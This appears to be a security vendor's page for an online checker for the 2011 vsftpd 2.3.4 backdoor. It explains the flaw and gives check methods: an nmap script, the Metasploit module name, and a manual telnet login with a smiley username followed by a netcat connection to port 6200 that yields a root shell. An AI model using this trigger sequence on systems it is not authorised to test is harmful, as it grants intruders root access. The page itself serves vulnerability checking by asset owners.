S4E

Vsftpd Backdoor Checker

If you are using VSFTPD for FTP server, it is better to check your system for a backdoor vulnerability that emerged in the past years.

Short Info


Level

Critical

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

5 seconds

Time Interval

2 months 25 days

Scan only one

Domain, IPv4

Toolbox

-
Vsftpd Backdoor Checker

What is FTP ?

FTP (File Transfer Protocol) is a TCP-based protocol that enables file transfer between the server and the client. There are different software offering FTP service and VSFTPD is only one of them.


What is vsFTP Backdoor Vulnerability ?

In 2011, attackers managed to place a code snippet with a backdoor to vsFTPd 2.3.4 version source code.

If you installed vsFTPd 2.3.4 version with changed source code in 2011, you might be impacted by this vulnerability. People with malicious intent who exploit this vulnerability can access to user rights with the highest authorisation in the target system.


How To Check vsFTP Backdoor Vulnerability ?

You can check vsFTP Backdoor vulnerability with our free and online vsFTP Backdoor Vulnerability Checker. tool To do this, you can start by typing your domain name in the form on top of the page and start scanning.

Or you can run nmap --script ftp-vsftpd-backdoor -p 21 Target_Host command on nmap tool which can be installed to all operating systems.

Also, you can use vsftpd_234_backdoor exploit module of “Metasploit Framework” to check the vulnerability.

Lastly, you can check manually. If your FTP server is impacted from this vulnerability, you will have a result similar to the following:

	telnet 172.19.0.100 21
 	Trying 172.19.0.100...
 	Connected to 172.19.0.100.
 	Escape character is '^]'.
 	220 (vsFTPd 2.3.4)
 	USER invaliduser: )
 	331 Please specify the password.
 	PASS invalidpass
 	^]
 	telnet> quit
 	Connection closed.

When you deactivate the telnet connection and try to connect with 6200 port by using netcat or telnet command, you can see that operating system command runs with authorised user rights:

	nc 172.19.0.100 6200
	id
	uid=0 (root) gid=0 (root)
Get started to protecting your Free Full Security Scan